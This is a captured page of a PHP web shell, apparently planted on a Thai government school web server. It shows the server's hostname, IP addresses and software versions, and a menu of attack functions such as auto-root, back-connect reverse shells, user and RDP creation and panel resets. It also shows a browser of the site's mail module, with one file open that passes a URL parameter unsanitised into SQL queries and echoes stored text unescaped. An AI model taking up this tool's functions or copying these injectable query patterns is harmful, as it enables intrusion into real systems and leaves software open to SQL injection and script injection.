Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
meeting /
mail /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
download.php
1.97
KB
-rw-r--r--
group.php
5.55
KB
-rw-r--r--
group_member.php
4.34
KB
-rw-r--r--
group_member_report.php
2.99
KB
-rw-r--r--
livesearch.php
536
B
-rw-r--r--
maildetail.php
4.91
KB
-rw-r--r--
maildetail_xx.php
5.03
KB
-rw-r--r--
permission.php
8.22
KB
-rw-r--r--
receive.php
8.78
KB
-rw-r--r--
receive_mobile.php
7.29
KB
-rw-r--r--
receive_mobile_xx.php
6.29
KB
-rw-r--r--
receive_xx.php
7.87
KB
-rw-r--r--
search.php
11.3
KB
-rw-r--r--
select_send.php
6.01
KB
-rw-r--r--
select_send_2.php
5.71
KB
-rw-r--r--
select_send_3.php
8.3
KB
-rw-r--r--
send.php
30.48
KB
-rw-r--r--
send_mobile.php
28.04
KB
-rw-r--r--
sendto_show.php
2.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : maildetail_xx.php
<?php session_start(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php if(isset($_SESSION['user_os'])){ if($_SESSION['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } ?> <style type="text/css"> <!-- .style1 { font-size: 12px; } --> </style> </head> <body> <?php date_default_timezone_set('Asia/Bangkok'); require_once "../../../amssplus_connect.php"; require_once("../../../mainfile.php"); require_once("../time_inc.php"); $user=$_SESSION['login_user_id']; $sql = "select * from mail_main left join person_main on mail_main.sender=person_main.person_id where mail_main.ms_id='$_GET[id]' "; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); $sender=$result['sender']; $ref_id=$result['ref_id']; $detail=$result['detail']; $send_date=$result['send_date']; $prename=$result['prename']; $name= $result['name']; $surname = $result['surname']; //กรณีโรงเรียน if($name==""){ $sql_sch= "select * from person_sch_main where person_id='$sender' "; $dbquery_sch= mysqli_query($connect,$sql_sch); $result_sch=mysqli_fetch_array($dbquery_sch); $prename=$result_sch['prename']; $name= $result_sch['name']; $surname = $result_sch['surname']; } $full_name="$prename$name $surname"; $thai_send_date=thai_date_4($send_date); //บันทึกรับ $day_now=date("Y-m-d H:i:s"); $query_receive =mysqli_query($connect,"select * from mail_sendto_answer where ref_id='$ref_id' and send_to='$user' and answer='0' "); $receive_num=mysqli_num_rows($query_receive); if($receive_num>=1){ $sql = "update mail_sendto_answer set answer='1', answer_time='$day_now' where ref_id='$ref_id' and send_to='$user' "; mysqli_query($connect,$sql); } ?> <div align="center"> <table border="0" width="100%" id="table1" style="border-collapse: collapse; border: 1px dotted #FF00FF; ; padding-left:4px; padding-right:4px; padding-top:1px; padding-bottom:1px" cellpadding="2" > <tr> <td bgcolor="#003399" colspan="2" style="border: 1px dotted #808000"><font color="#FFFFFF"> <span lang="en-us"><font size="2"> </font></span><font size="2">รายละเอียดของจดหมาย </font></font></td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2" > จาก : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $full_name;?></font></td> </tr> <tr> <td width="449" align="right" colspan="2" style="border: 1px dotted #808000"> <p align="left"><font size="2" > เรื่อง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $result['subject'];?></FONT> </td> </tr> <tr> <td width="85" align="left" style="border: 1px dotted #808000"><font size="2" > ข้อความ</font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table2" style="border-collapse: collapse" bordercolor="#808000" cellspacing="2" cellpadding="2"> <tr> <td align="left"><FONT SIZE="2" align="left"><?php echo $result['detail'];?></FONT></td> </tr> </table> </div> </td> </tr> <tr> <td align="left" style="border: 1px dotted #808000"><font size="2"> ไฟล์แนบ </font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellspacing="2" cellpadding="2"> <?php // check file attach $sql_file = mysqli_query($connect,"SELECT * FROM mail_filebook WHERE ref_id = '$ref_id' ") ; $file_num = mysqli_num_rows ($sql_file) ; if ($file_num<> 0) { $list = 1 ; while ($list<= $file_num&&$row= mysqli_fetch_array($sql_file)) { $file_name = $row['file_name'] ; $file_des = $row['file_des'] ; ?> <tr> <td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><A HREF="../upload_files/<?php echo $file_name;?>" title="คลิกเพื่อเปิดไฟล์แนบลำดับที่ <?php echo $list;?>" target="_BLANK"><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></A></td> </tr> <?php $list ++ ; } }else { ?> <tr> <td align="left"> <FONT SIZE="2" COLOR="#CC3300"> ไม่มีไฟล์แนบ</FONT></td> </tr> <?php } ?> </table> </div> </td> </tr> <tr> <td align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> วันที่ส่ง : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $thai_send_date;?></font></td> </tr> </table><BR> </div> <CENTER><input border="0" src="../images/button95.jpg" name="I1" width="100" height="20" type="image" onClick="javascript:window.close()"></CENTER> </body> </html>
Close